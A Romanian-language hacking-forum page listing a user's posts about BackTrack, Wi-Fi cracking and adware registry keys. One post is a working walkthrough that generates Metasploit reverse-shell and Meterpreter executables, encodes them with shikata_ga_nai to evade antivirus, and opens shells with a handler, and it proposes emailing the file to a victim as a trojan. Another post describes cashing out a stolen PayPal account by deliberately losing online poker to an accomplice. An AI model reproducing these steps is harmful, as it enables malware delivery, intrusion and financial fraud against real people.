Jump to content

neox

Active Members
  • Posts

    879
  • Joined

  • Last visited

  • Days Won

    24

Everything posted by neox

  1. uitate ii regedit Start<run<regedit daca ai asa ceva HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\search-soft.net HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\.63.219.181.7 HKEY_USERS\S-1-5-21-1220945662-1708537768-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\63.219.181.7 HKEY_USERS\S-1-5-21-1220945662-1708537768-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\search-soft.net daca ai spune
  2. problema cu grafik ii ca sint vechi sistemurile EDIT: cu backtrack 3.0 nu am probleme, totul merge lacrima. doar in VESA mode, ca in KDE imi da eroare "No screens found"...poate ma ajutati si cu problema asta !! cind iti apare gresala asta scrie fixvesa si dupaia merge
  3. mersi daatdraqq daca ceva nu merge spuneti si rezolvam
  4. baieti spunetimi un host bun rominesc ca sa actualizez Backtrack-hack video ca o expirat de la rapide si am uitat ceva sa va arat ca eu fac asta la inceput in Backtrack4 dupa instalare ca sa ai succes cu Metasploit ca sa nu arate ca virus sau ca atack pe sistemul victima faceti asa Cu Metasploit, este posibil s? creze sarcinile utile, executabil de exemplu, s? ia o Reverse Shell atacator. Acesta este un fi?ier executabil exe . Între timp, scanere virusului sunt o parte de baz? al oric?rui sistem ?i, prin urmare, este important ca Payload sa nu fie cunoscut ca virus cum facem un Payload cu Reverse Shell? asa in backtrack 4 deschidem console si dam urmatarea comanda intre liniute ii todauna comanda ------------------------------------------------------------------------------------------- /pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 X > payload.exe ------------------------------------------------------------------------------------------- si in consola iti arata asa Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 278 Options: LHOST=192.168.1.100 binenteles ca la ip trebuie dat ip vostru Pentru a codifica Payload urmeaz? s? fie elaborate astfel încât sa nu fie detecta ca virus pentru a trimite prin intermediul msfencode. Alege?i din acestea Encoder urm?toarele (respect? rank): dai conanda asta in aceiasi consola ------------------------------------------------------------------------------------------- /pentest/exploits/framework3/msfencode -l ------------------------------------------------------------------------------------------- si iti arata asa Framework Encoders ================== Name Rank Description ---- ---- ----------- cmd/generic_sh normal Generic Shell Variable Substitution Command Encoder generic/none normal The "none" Encoder mipsbe/longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/base64 normal PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder Acum ne putem crea un Payload pentru compara?ie cu encoder x86/countdown ?i verificatile pe VirusTotal ?i apoi vom crea un Payload cu encoder x86/shikata_ga_nai ?i verifica?i-l, de asemenea. x86/countdown-Encoder: iara in aceiasi consola urmatoarea comanda asa ii o singura comanda de la un cap la altul ------------------------------------------------------------------------------------------- /pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/countdown -c 4 -t exe -o payload-countdown.exe ------------------------------------------------------------------------------------------- si iti arata asa in console [*] x86/countdown succeeded with size 297 (iteration=1) [*] x86/countdown succeeded with size 315 (iteration=2) [*] x86/countdown succeeded with size 333 (iteration=3) [*] x86/countdown succeeded with size 351 (iteration=4) la virustotal din 40 virusscaner il recunoaste 7 ca virus înc? . x86/shikata_ga_nai-Encoder: iara console dai comanda asta ------------------------------------------------------------------------------------------- /pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 4 -t exe -o payload-shikata_ga_nai.exe ------------------------------------------------------------------------------------------- asa iti arata in console [*] x86/shikata_ga_nai succeeded with size 306 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 333 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 360 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 387 (iteration=4) la virustotal il recunoaste numa 6 programe virus acuma Dup? diferitelor teste cu codificatoare diferite, num?r diferit de iterations, rata de succes a virusului întotdeauna 6 - 9 sint cunoscute (din 40 scanere) cel mai mult am reusit sa fie cunoscut numa de 2 programe de antivirus dar trebuie lucrat cu ollydbg si ii mult de lucru pe desktop o facut trei exe le poti testa sa vezi cum merg ori le trimiti prin e-mail sau il folosesti ca server trojan si il trimiti la victima dar poti testa si pe un host virtual Payload in Action asa il chemi cu comanda asta console ------------------------------------------------------------------------------------------- /pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 O ------------------------------------------------------------------------------------------- asa iti arata in console [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique: seh, thread, process LHOST 192.168.1.100 yes The local address LPORT 4444 yes The local port 12:45:55 m1k3-offsec ~ [root]/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Sending stage (474 bytes) [*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.103:7636) Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. E:\payload> de acia faceti ce vreti La fel de simplu ca se poate merge si au o cochilie tunel de la re?eaua intern? a atacator ?i el are acces la re?eaua intern? a victimei ! meterpreter Conectarea ?i asat ia toate aconturile si pass iara in consola asa ala ce lai facut cu x86/shikata_ga_nai-Encoder: ------------------------------------------------------------------------------------------- /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 3 -t exe -o test/payload-meterpreter-shikata_ga_nai-3encoding.exe ------------------------------------------------------------------------------------------- si asa iti arat in console [*] x86/shikata_ga_nai succeeded with size 306 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 333 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 360 (iteration=3) 12:52:13 m1k3-offsec ~ [root]/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Starting the payload handler... [*] Started reverse handler [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (50 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (87 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.103:7673) meterpreter > help ... acelasi lucru faci in framework3 asa cum am facut eu video backtrack-hack la voi intra payload standard in actiune si ala ii naspa deci navigezi in console bt asa deschizi o consola nou dai cd /pentest/exploits/framework3/ si pe urma dai comenzile de mai sus pe care leam aratat numa comenzile cu encoder fara payload in actiune si pe urma aveti si voi payload bun fara ca sa faca probleme in pc vitima dar sa fiti atent la ip ce vil da backtrack exemplu tu ai ip 192.168.1.165 ai facut payload si pe urma merge citeva zile si bt schimba ip intra nu mai merge payload ala modificat ,merge payload ala standard deci sa fiti atent la ip ori faci cu encoder de cite ori schimba ip ori faci numa o data si iti schimbi tu ip inapoi scuze degramatica si scris cred ca scriu de o ora
  5. Zatarra la mine ii naspa ca eu am internet slab am de la vecinu la negru si ala trage filme si mai multe am facut un test si asta ii maximul ce primesc de la iel, cind incarc un video la rapide astept la 40mb aproape o ora Download1.380 kbit/s (173 kByte/s) Upload 168 kbit/s (21 kByte/s) dar eu normal folosesc un alt modem Huawei E220 UMTS Modem cu carte de austria a1vodafone dar nu am avut cartea incarcata cu ala merge repede eu scanez cu nmap in mare o clasa si selectez ip si dupaia le mai scanez o data separat
  6. video tutorial hack RapidShare: 1-CLICK Web hosting - Easy Filehosting aicia ii inca o data video http://www.fileshare.ro/1581041404.88
  7. Video tutorial bt-vs-ftp http://www.mediafire.com/?4jdcsb4wqpxm0oc
  8. nu mai am timp ma mai uit citeodata pe forum dar nu mai am timp sa fac
  9. cauta pe forum ca ieste asa ceva tutoriale video
  10. cartea ii naspa si eu am avut si tot asa facea nu merge constant tot pierde din signal intrerupe conectiunea ,si la tine cauta incontinu ip nu sa mearga o sa iti faca numa nervi
  11. penal postul sa mor daca am mai vazut asa ceva absurd oricum la primul post merge ie incepator
  12. da ai dreptate cain-abel merge numa daca stickul sau wlan karte ii compatabil airpcap merge asa bt3 sa acumulezi pachetele si sa le spargi cu cain -abel asta merge nu conteza daca ii compatabil dar la wpa ii sansa de a sparge 20% foarte greu,web ii sansa de 100%
  13. bt4 ii la fel ca bt3 io schimbat interfata si are Kernel 2.6.28.1 si nu mai face probleme Hardware adica recunosate sound,si multe probleme care o avut BT3 la uni bt4 are optiune de update ca la xp sa ii repare greselile dar inca ii bt4 beta deci mai asteptam pana apare final care ati instalat si ce pareri aveti despre BT4 scuzati scrisul si gramatica
  14. nici o data fara parola nu te poti conecta mam referit daca signalul de conectiune ii parolat numa daca afli parola cu BT3 ,nu poti sa sari peste parola si sa te conectezi ori nu am inceles ce vrea sa spuna Luv'RstCENTER
  15. salut poate va intereseaza citeva video cu antene wlan http://www.metacafe.com/watch/837885/wifi_antenna_hack/ http://www.metacafe.com/watch/1859528/compact_wifi_superantenna/ http://www.metacafe.com/watch/1049996/10_wifi_super_antenna/ http://www.metacafe.com/watch/1812670/wiffy_extreme_wifi_antenna/ http://www.metacafe.com/watch/yt-Jht-s_i__AE/phantom_geek_intro_part2/
  16. nu ne dam mare omul o intrebat si o zis sa presupunem ca am un cont paypal tu deviezi de la subiect cu ce ai scris tu
  17. te inseli eu nu stiu in ro care ii treaba cu paypal ca nu locuiesc in ro dar in germania merge uite numa un exemplu o pagina de net ii pe germana de casino sau poker si iti scrie ce metode de plata acepata si daca ma apuc sa caut pe net iti gasesc cite vrei tu care acepta metoda de plata paypal http://de.pacificpoker.com/de/online-poker-help/payment-methods--3,0,1.htm#online%20bank http://de.777.com/artikel/bezahlungen-in-online-casinos#header_2
  18. kafka nici eu nu am inceles ce vrei sa spui
  19. sal sa zicem ca tu ai contu lui ala are 500€ pe iel simplu eu am un profil onlinepoker cu cont paypal te duci la un net internet cafe sau un wlan iti faci si tu un profil la online poker si dai contu paypal a lui ala si jucam amindoi poker asta faci cu cine vrei tu joci aiurea si partenerul cistiga pe contu lui legal bani si impartiti asta ii garantata
  20. deci am luat tema " cum visrusezi la unu PC doar accesand o pagina" ba frate am murit de ris comentarele astea merita un oscar toate comentare sint tari de tot ) sa mor daca nu iti merge bine intro zi iti repari ziua aicia la categoria asta
  21. neox

    salutare

    bun venit dar cred ca o plecat de pe forum, pe asta nu il mai vedem pe aici o vazut ca nu ii merge o crezut ca sintem toti de 12ani
  22. neox

    re

    tare raspunsu Hertz dar prea multe scapa .....
  23. neox

    re

    categori sau aleva nu mai trebuie, forumul ii perfect ce mai trebuie aici a se lua masura de limbajul vorbit se vb foarte urit pe forum
  24. neox

    un hack

    tare sa mor imi place daca nu ar fii tipii ca asta pe forum ma plitisesc
  25. uitate daca vrei ca sa iti explic pe romineste nu stiu daca vrei pe germana iti explic tot
×
×
  • Create New...